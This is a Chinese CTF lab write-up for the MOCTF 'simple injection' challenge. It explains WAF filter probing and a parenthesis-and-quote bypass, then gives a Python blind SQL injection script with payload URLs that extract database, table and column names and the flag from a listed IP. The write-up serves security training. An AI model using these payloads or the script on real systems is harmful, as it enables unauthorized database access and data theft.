2. 程式人生 > >MOCTF 簡單註入,記錄一下盲註腳本

MOCTF 簡單註入,記錄一下盲註腳本

阿新 發佈:2018-12-02
字符型註入 where als 過濾 無法 語義 sql 原來 輸出

最近在練習sql註入寫腳本,記錄一下思路,剛學的and 1=1也拿出來溜溜

http://119.23.73.3:5004/?id=1

首先,沒有被過濾是正常顯示。  
沒有被過濾但是查詢不到就是空白,比如?id=99999
waf過濾關鍵詞,提示whatfuck

我首先判斷的是有沒有用trim()函數,要知道trim函數和過濾是不一樣的。

區別很簡單,舉個例子。trim默認移除字符串左右兩邊的空格

 http://119.23.73.3:5004/?id=1(此處1後邊有空格)
 如果使用了trim()函數,也過濾掉了空格。
 那麽這個不會出waf的,而是會正常顯示id=1的內容。
 會讓你以為空格並沒有過濾,是因為trim函數把空格去掉後才用waf函數進行的判斷。

測試的方法很簡單?id=1 1,讓空格在裏面就好了。

發現過濾了空格,尋找能夠代替空格的字符。

%20 %09 %0a %0b %0c %0d %a0 %00 /**/    ()

發現只有()沒有被過濾。

判斷是整形註入還是字符型註入,?id=1-0,發現不是id=1的界面,不是整形註入

判斷id的保護是什麽?首先猜測是引號,輸入1‘1,(這裏為了排除trim函數的影響),發現沒有出現waf,但是會出現空白。所以是單引號保護,因為單引號沒有被過濾,會匹配原來保護id的兩個單引號的前一個,導致了有一了孤零零的單引號沒有人和他配對,就會出錯,什麽也查不出來。

判斷截斷字符有沒有被過濾,發現嘗試%23,--+,--%20都會被過濾。

所以考慮and ‘1這樣繞過,匹配最後的那個‘,不讓他孤零零,有任何他匹配就不會出錯。

判斷其他的過濾字符

union被過濾,無法使用聯合查詢
> < like regexp被過濾,但是=沒有被過濾,between and 也沒有被過濾。  
or被過濾,information這個一會再說,有點特殊。  
mid,ascii沒有被過濾,逗號也沒有被過濾。

判斷邏輯

http://119.23.73.3:5004/?id=1%27and(select(0))and%271
http://119.23.73.3:5004/?id=1%27and(select(1))and%271

發現可以判斷出來註入的邏輯,只要構造語句讓select(0)和select(1)裏面的1,0值出現就可以判斷了。

腳本,py3

import requests

shiliu="0x20"
zuihou="0x7f"
i=1
while True:
    #http://119.23.73.3:5004/?id=1%27and(select(mid((select(database())),1,1))=%27m%27)and%271 #MOCTF
    #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=‘moctf‘)between("+shiliu+")and(0x7f))and%271"  #DO_Y0U_L1KE_LONG_T4BLE_NAME,NEWS
    #url="http://119.23.73.3:5004/?id=1%27and(select(select(group_concat(column_name))from(information_schema.columns)where(table_name)=‘do_y0u_l1ke_long_t4ble_name‘)between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
    url="http://119.23.73.3:5004/?id=1%27and(select(ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),"+str(i)+",1)))between("+shiliu+")and(0x7f))and%271"  #D0_YOU_ALS0_L1KE_VERY_LONG_COLUMN_NAME
    res=requests.get(url)
    #print(url)


#MOCTF{B1IND_SQL_1NJECTI0N_G0OD}

    if "Hello" not in res.text:
        i+=1
        x=hex(int(shiliu,16)-1)
        if ‘20‘ in x:
            break;
        print(x)
        zuihou = shiliu + zuihou.replace("0x","")



        shiliu="0x20"
        #shiliu=x+shiliu.replace("0x","")   #跑前三個的時候這個不能註釋掉,跑最後一個得註釋掉



    shiliu=str(hex(int(shiliu,16)+1))

數據庫我是手動測試的,是moctf,然後剩下的,一開始偷了懶,沒用ascii跑,結果flag大小寫都提交不上,原因是flag有大寫也有小寫,數據庫是對大小寫不敏感的,用ascii就可以了

第一個語句我沒用腳本跑,自己用手試出來的。

moctf{b1ind_SQL_1njecti0n_g0od}  
兄弟們不會做的就問啊,輸出一下url,挨個看看怎麽跑的,直接提交flag沒啥用

最後說一下那個or被過濾了,為什麽information沒有被過濾。

information確實被過濾了,但是information只要加上其他為被過濾的字符,也不會被過濾。

為此還去群裏問了下,

出題人:Waf加了智能識別語義,information語境就不過濾,這樣聽起來會不會更牛逼

MOCTF 簡單註入,記錄一下盲註腳本

相關推薦

MOCTF 簡單記錄一下註腳

字符型註入 where als 過濾 無法 語義 sql 原來 輸出 最近在練習sql註入寫腳本,記錄一下思路,剛學的and 1=1也拿出來溜溜 http://119.23.73.3:5004/?id=1 首先,沒有被過濾是正常顯示。 沒有被過濾但是查詢不到就是空白,

Moctf---簡單

hex column port 命令 form 構造 結果 。。 etc 因為比較菜誒,所以這道題的命令讓我拼接了好久。記錄在此 放出url = http://119.23.73.3:5004/ 打開後我們在後面寫?id=1既--> 當我們輸入的信息有誤後,頁面

c#配置問題以及簡單防止sql連接池問題sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

關於簡單動態路由協議配置路由重分布

ket 分配 地址 bsp 創建 nds mis tracer ria 動態路由的配置記錄基於cisco模擬器 Packet Tracer Student 6.2 ,一下是實踐以及具體內容 拓撲結構基本如圖所示:   RIP協議   RIP協議現有兩個版本,v1和v2 ,

aapt解析的坑記錄一下防止再次掉

在將app釋出到各大市場上之前我們需要自己在本地用aapt解析一遍上傳的apk檔案,當然你也可以選擇等各大市場將你的apk打回來之後再去檢查原因,好了,進入正題,解析apk時提示“ERROR getting 'android:icon' attribute: attribu

用到了base64轉圖片文件的函數記錄一下

base64 圖片 import java.io.*; import sun.misc.*; //對圖片文件進行Base64編碼 public String getImagebase64(String imgFileName) { byte[] data = null

關於springboot項目中自動但是用的時候值為空的BUG

cte 沒有 根目錄 原因 框架 初始化 工具 如果 config 最近想做一些web項目來填充下業余時間,首先想到了使用springboot框架,畢竟方便 快捷 首先:去這裏 http://start.spring.io/ 直接構建了一個springboot初始化的項目

解析數據庫以及SQL大佬勿噴

min 數據結構 了解 sql語句 我只 md5 服務 pass 進行 1.什麽是數據庫? 數據庫(Database)是按照數據結構來組織、存儲和管理數據的倉庫,它產生於距今六十多年前,隨著信息技術和市場的發展,特別是二十世紀九十年代以後,數據管理不再僅僅是存儲和管理數據,

Spring quartz Job不能依賴Spring整合quartz Job任務不能

nbsp too upd ticket enter java代碼 rec onf 2.3 Spring quartz Job不能依賴註入,Spring整合quartz Job任務不能註入 Spring4整合quartz2.2.3中Job任務使用@Autowired不能註入

Spring筆記03(創建對象DI設值自動裝配(autowire))

實現 des sleep XML auto 初始 system 驗證 方法 1.創建對象的三種方式: 01.Animal接口代碼: package cn.pb.dao; /** * 動物接口 */ public interface Animal { //吃飯

thinkPHP使用中踩的坑記錄一下(不停更)

切換 合法性 問題 table 字符串 mode true use data 版本3.2.3 1、數據庫操作中的連貫操作table(),在查詢的時候可以切換表,但是在插入,更新的時候請不要使用。例如 D(‘user‘)->table(‘auth‘)->add(

SSM-Spring-04:Spring的DI的構造P命名和集合

集合 @override frame encoding contex 最好 xml文件 .get ons ------------吾亦無他,唯手熟爾,謙卑若愚,好學若饑------------- DI和IOC相比,DI更偏向於實現 DI的set方式註

詭異的事件記錄一下

恢復 pro 進度條 詭異 div 安全模式 AC chage 記錄 今天碰到一個詭異的問題,macpro的鍵盤重啟之後不能用了,查了之後發現碰到這個問題的小夥伴還挺多的,記錄一下。 啟動時按住左邊 Shift,直至出現進度條,放手,等待進入 mac 安全模式 進入系統

vue中遇到的一些坑記錄一下

class 會有 判斷 inject safari 項目 否則 lag 結合 最近用vue開發完成了網頁和app的項目試著想記錄下遇到的坑,以免下次遇到的時候就輕松解決了 一、vue開發pc端 1、 cookie不用中文的,和時間格式不要帶’/’ ,否則safari

最近一個項目需要使用vue作為小白記錄一下自己的學習歷程吧(項目之環境配置)

代理 切換 node tao 容易 分布式版本控制 sig 兩個文件 速度 一、環境準備 1.git 2.19.0(免費、開源的分布式版本控制系統)   下載地址:https://git-scm.com   查看git版本:安裝完成後,打開命令提示符輸入 git

第一次寫隨筆記錄一下初衷

經歷 什麽 解決方法 問題 關於 喜歡 不能 一段 而且 經歷了一個思想鬥爭後,我想明白了,為什麽要寫博客。 之前學習時遇到了問題,百度後,在一篇博客幫助下快速的解決了。 於是我想,我不是不也可以通過記錄自己的經歷,來幫助他人?而且費曼學習法中,也提到了,教會他人是掌握技能

黑科技揭秘:百種異常隨機專有雲為何穩如泰山

雲計算 升級版 需求 做了 隨機 雲棲大會 企業應用 diy 業務 摘要: 關鍵應用服務中斷引發一系列連鎖反應,起因僅是一塊磁盤被寫滿?為什麽這麽巧,兩個小概率的問題偏偏一起發生,造成保護失效?為什麽我們做了測試演練,然而真正發生問題依然踩坑?”2018杭州雲棲大會主論壇演

sql學習筆記什麽是sql如何尋找漏洞如何攻擊如何預防

產生 回收 異常 學習 .com 就會 inf get 識別 什麽是SQL註入 如何理解sql註入? sql註入是一種將sql代碼添加到輸入參數中,傳遞到sql服務器解析並執行的一種攻擊手法 示例: 本地一段代碼為get獲取id值,輸出實際

在win10系統下學習微信的小程式開發時遇到的問題記錄一下解決經過

今天剛更新完win10系統下微信開發者工具v1.02.1810250版本,開啟開發者工具建立小程式,進入沒有看到專案,模擬器也無法正常顯示,大致如下圖. 開啟小程式所在的目錄卻能看見專案確實已經建立,但工具裡面沒顯示出來   匯入之前的打好的專案和官方的demo也沒

iOS 記錄一下自己對於圓角優化效能的理解

公司開發多個專案中,檢視的圓角是不可避免的,也是增加美觀度的一種方式,下面談一下“老生常談”的圓角問題,以下是個人理解。 圓角的常用設法,cornerRadius設定圓角 , masksToBounds把整個圖層蒙上圓角 。 _whiteView.layer.cornerRad